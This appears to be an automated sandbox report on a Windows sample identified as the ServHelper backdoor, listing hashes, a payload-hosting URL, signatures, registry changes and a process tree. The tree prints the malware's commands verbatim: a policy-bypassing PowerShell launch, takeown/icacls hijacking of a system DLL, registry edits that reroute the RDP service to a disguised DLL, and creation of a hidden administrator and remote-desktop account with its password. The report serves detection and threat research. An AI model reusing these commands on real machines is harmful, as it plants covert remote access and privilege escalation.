Analysis
-
max time kernel
93s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 09:27
Static task
static1
Behavioral task
behavioral1
Sample
08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Resource
win10v2004-20231215-en
General
-
Target
08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
-
Size
4.5MB
-
MD5
2519d825ce34edc5881380dfe1a2f9c4
-
SHA1
642d87e38007682e8c60265ee59e67b09c32eb16
-
SHA256
08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12
-
SHA512
e4dfe0e8f3100824bd74942f4b97d39812055a572a1050ce8b18d0485c3f4bc42eb06c220ad4b145c055af7184ea31ca0274fcb029485f3cf90c8e81613c1ddd
-
SSDEEP
49152:E8CdRhKHG/xe5R7w0XQ5lh6aoBaD8NB+uLqXnVMlONTKFMc8XQDmDzE8k/9U1:E8eKHGJG
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 24 2136 powershell.exe 26 2136 powershell.exe 28 2136 powershell.exe 32 2136 powershell.exe 34 2136 powershell.exe 36 2136 powershell.exe 38 2136 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 448 icacls.exe 4560 icacls.exe 1756 icacls.exe 1352 icacls.exe 3716 icacls.exe 3312 icacls.exe 1904 icacls.exe 1380 takeown.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 964 964 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 4560 icacls.exe 1756 icacls.exe 1352 icacls.exe 3716 icacls.exe 3312 icacls.exe 1904 icacls.exe 1380 takeown.exe 448 icacls.exe -
Processes:
resource yara_rule C:\Windows\Branding\mediasrv.png upx C:\Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 18 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D13.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D35.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zjuwlo4.nrz.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D23.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D34.tmp powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_b2vuby12.bpo.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5144 powershell.exe 5144 powershell.exe 5184 powershell.exe 5184 powershell.exe 2068 powershell.exe 2068 powershell.exe 4500 powershell.exe 4500 powershell.exe 5144 powershell.exe 5144 powershell.exe 5144 powershell.exe 2136 powershell.exe 2136 powershell.exe 2136 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 676 676 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 5144 powershell.exe Token: SeDebugPrivilege 5184 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeRestorePrivilege 4560 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2860 WMIC.exe Token: SeIncreaseQuotaPrivilege 2860 WMIC.exe Token: SeAuditPrivilege 2860 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2860 WMIC.exe Token: SeIncreaseQuotaPrivilege 2860 WMIC.exe Token: SeAuditPrivilege 2860 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 5488 WMIC.exe Token: SeIncreaseQuotaPrivilege 5488 WMIC.exe Token: SeAuditPrivilege 5488 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 5488 WMIC.exe Token: SeIncreaseQuotaPrivilege 5488 WMIC.exe Token: SeAuditPrivilege 5488 WMIC.exe Token: SeDebugPrivilege 2136 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2636 wrote to memory of 5144 2636 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe powershell.exe PID 2636 wrote to memory of 5144 2636 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe powershell.exe PID 5144 wrote to memory of 2476 5144 powershell.exe csc.exe PID 5144 wrote to memory of 2476 5144 powershell.exe csc.exe PID 2476 wrote to memory of 3424 2476 csc.exe cvtres.exe PID 2476 wrote to memory of 3424 2476 csc.exe cvtres.exe PID 5144 wrote to memory of 5184 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 5184 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 2068 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 2068 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 4500 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 4500 5144 powershell.exe powershell.exe PID 5144 wrote to memory of 1380 5144 powershell.exe takeown.exe PID 5144 wrote to memory of 1380 5144 powershell.exe takeown.exe PID 5144 wrote to memory of 448 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 448 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 4560 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 4560 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1756 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1756 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1352 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1352 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 3716 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 3716 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 3312 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 3312 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1904 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 1904 5144 powershell.exe icacls.exe PID 5144 wrote to memory of 5604 5144 powershell.exe reg.exe PID 5144 wrote to memory of 5604 5144 powershell.exe reg.exe PID 5144 wrote to memory of 4552 5144 powershell.exe reg.exe PID 5144 wrote to memory of 4552 5144 powershell.exe reg.exe PID 5144 wrote to memory of 1064 5144 powershell.exe reg.exe PID 5144 wrote to memory of 1064 5144 powershell.exe reg.exe PID 5144 wrote to memory of 5968 5144 powershell.exe net.exe PID 5144 wrote to memory of 5968 5144 powershell.exe net.exe PID 5968 wrote to memory of 1768 5968 net.exe net1.exe PID 5968 wrote to memory of 1768 5968 net.exe net1.exe PID 5144 wrote to memory of 5712 5144 powershell.exe cmd.exe PID 5144 wrote to memory of 5712 5144 powershell.exe cmd.exe PID 5712 wrote to memory of 4768 5712 cmd.exe cmd.exe PID 5712 wrote to memory of 4768 5712 cmd.exe cmd.exe PID 4768 wrote to memory of 4608 4768 cmd.exe net.exe PID 4768 wrote to memory of 4608 4768 cmd.exe net.exe PID 4608 wrote to memory of 3260 4608 net.exe net1.exe PID 4608 wrote to memory of 3260 4608 net.exe net1.exe PID 5144 wrote to memory of 5736 5144 powershell.exe cmd.exe PID 5144 wrote to memory of 5736 5144 powershell.exe cmd.exe PID 5736 wrote to memory of 5688 5736 cmd.exe cmd.exe PID 5736 wrote to memory of 5688 5736 cmd.exe cmd.exe PID 5688 wrote to memory of 4312 5688 cmd.exe net.exe PID 5688 wrote to memory of 4312 5688 cmd.exe net.exe PID 4312 wrote to memory of 5300 4312 net.exe net1.exe PID 4312 wrote to memory of 5300 4312 net.exe net1.exe PID 4360 wrote to memory of 1740 4360 cmd.exe net.exe PID 4360 wrote to memory of 1740 4360 cmd.exe net.exe PID 1740 wrote to memory of 844 1740 net.exe net1.exe PID 1740 wrote to memory of 844 1740 net.exe net1.exe PID 3108 wrote to memory of 3996 3108 cmd.exe net.exe PID 3108 wrote to memory of 3996 3108 cmd.exe net.exe PID 3996 wrote to memory of 4708 3996 net.exe net1.exe PID 3996 wrote to memory of 4708 3996 net.exe net1.exe PID 5428 wrote to memory of 944 5428 cmd.exe net.exe PID 5428 wrote to memory of 944 5428 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe"C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470B.tmp" "c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc WyUVN0Zl /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc WyUVN0Zl /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc WyUVN0Zl1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc WyUVN0Zl2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
